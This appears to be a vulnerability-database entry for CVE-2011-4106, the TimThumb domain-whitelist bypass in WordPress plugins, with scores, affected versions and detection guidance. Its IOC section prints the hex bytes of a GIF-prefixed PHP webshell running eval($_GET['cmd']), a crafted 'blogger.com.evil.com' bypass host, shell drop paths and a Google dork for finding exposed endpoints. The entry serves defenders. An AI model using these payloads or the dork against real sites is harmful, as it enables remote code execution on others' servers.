cbcvebase.
CVE-2011-4106
published 2013-10-26

CVE-2011-4106: TimThumb (timthumb.php) before 2.0 does not validate the entire source with the domain white list, which allows remote attackers to upload and execute…

PriorityP275medium6.8CVSS 2.0
AVNACMAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
23.16%
97.5th percentile
TimThumb (timthumb.php) before 2.0 does not validate the entire source with the domain white list, which allows remote attackers to upload and execute arbitrary code via a URL containing a white-listed domain in the src parameter, then accessing it via a direct request to the file in the cache directory, as exploited in the wild in August 2011.

Affected

1 ranges
VendorProductVersion rangeFixed in
binarymoontimthumb<= 1.99

Detection & IOCsextracted from sources · hover to see the quote

filenametimthumb.php
path/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php
path/wp-content/plugins/category-grid-view-gallery/cache/
path/wp-content/plugins/auto-attachments/thumb.php
path/wp-content/plugins/auto-attachments/cache/
path/wp-content/plugins/wp-marketplace/libs/timthumb.php
path/wp-content/plugins/wp-marketplace/libs/cache/
path/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php
path/wp-content/plugins/dp-thumbnail/timthumb/cache/
path/wp-content/plugins/vk-gallery/lib/timthumb.php
path/wp-content/plugins/vk-gallery/lib/cache/
path/wp-content/plugins/rekt-slideshow/picsize.php
path/wp-content/plugins/rekt-slideshow/cache/
path/wp-content/plugins/cac-featured-content/timthumb.php
path/wp-content/plugins/cac-featured-content/temp/
path/wp-content/plugins/rent-a-car/libs/timthumb.php
path/wp-content/plugins/rent-a-car/libs/cache/
path/wp-content/plugins/lisl-last-image-slider/timthumb.php
path/wp-content/plugins/lisl-last-image-slider/cache/
path/wp-content/plugins/islidex/js/timthumb.php
path/wp-content/plugins/islidex/js/cache/
path/wp-content/plugins/kino-gallery/timthumb.php
path/wp-content/plugins/kino-gallery/cache/
path/wp-content/plugins/cms-pack/timthumb.php
path/wp-content/uploads/cms-pack-cache/
path/wp-content/plugins/a-gallery/timthumb.php
path/wp-content/plugins/a-gallery/cache/
path/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php
path/wp-content/plugins/category-list-portfolio-page/scripts/cache/
path/wp-content/plugins/really-easy-slider/inc/thumb.php
path/wp-content/plugins/really-easy-slider/inc/cache/
path/wp-content/plugins/verve-meta-boxes/tools/timthumb.php
path/wp-content/plugins/verve-meta-boxes/tools/cache/
path/wp-content/plugins/user-avatar/user-avatar-pic.php
path/wp-content/uploads/avatars/
path/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php
path/wp-content/plugins/extend-wordpress/helpers/timthumb/cache/
path/wp-content/themes/THEME/timthumb.php
path/wp-content/themes/THEME/cache/
bytes
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00
  • Monitor HTTP requests to timthumb.php (and aliases such as thumb.php, picsize.php, image.php) where the `src` GET parameter contains a subdomain-crafted URL embedding a whitelisted domain (e.g., blogger.com.evil.com) to bypass the domain whitelist check.
  • Alert on newly created .php files inside WordPress cache directories (e.g., wp-content/*/cache/*.php, wp-content/uploads/*/cache/*.php) — these are the webshells dropped by the exploit.
  • Detect the malicious polyglot payload: a GIF89a header (bytes 47 49 46 38 39 61) immediately followed by PHP eval($_GET['cmd']) code (bytes 3C 3F 70 68 70 20 40 65 76 61 6C 28 24 5F 47 45 54 5B 27 63 6D 64 27 5D 29 3B 20 3F 3E) in files fetched remotely by timthumb.
  • For the User Avatar plugin variant, watch for requests supplying an attacker-controlled `allowedSites[]` parameter alongside a crafted `src` URL, which requires register_globals to be enabled.
  • For the Rekt Slideshow plugin, the src parameter value is Base64-encoded before being passed to picsize.php — decode Base64 values in the src parameter when inspecting requests to this endpoint.
  • Use the Google dork `inurl:timthumb ext:php -site:googlecode.com -site:google.com` to identify exposed timthumb.php endpoints on internet-facing WordPress installations.
  • ·Only TimThumb versions 1.x through 1.32 cache the remote file as a .php file; version 1.33 changed the cache filename extension and does not save as .php, limiting direct code execution via the cache path.
  • ·The User Avatar plugin exploit variant additionally requires PHP register_globals to be enabled on the server and at least one user account to have an avatar directory.
  • ·Cache directory paths vary per plugin and host configuration; the shell drop location must be confirmed per deployment (e.g., external_md5(src).php vs md5(src).php naming differs between plugin versions).

CVSS provenance

nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.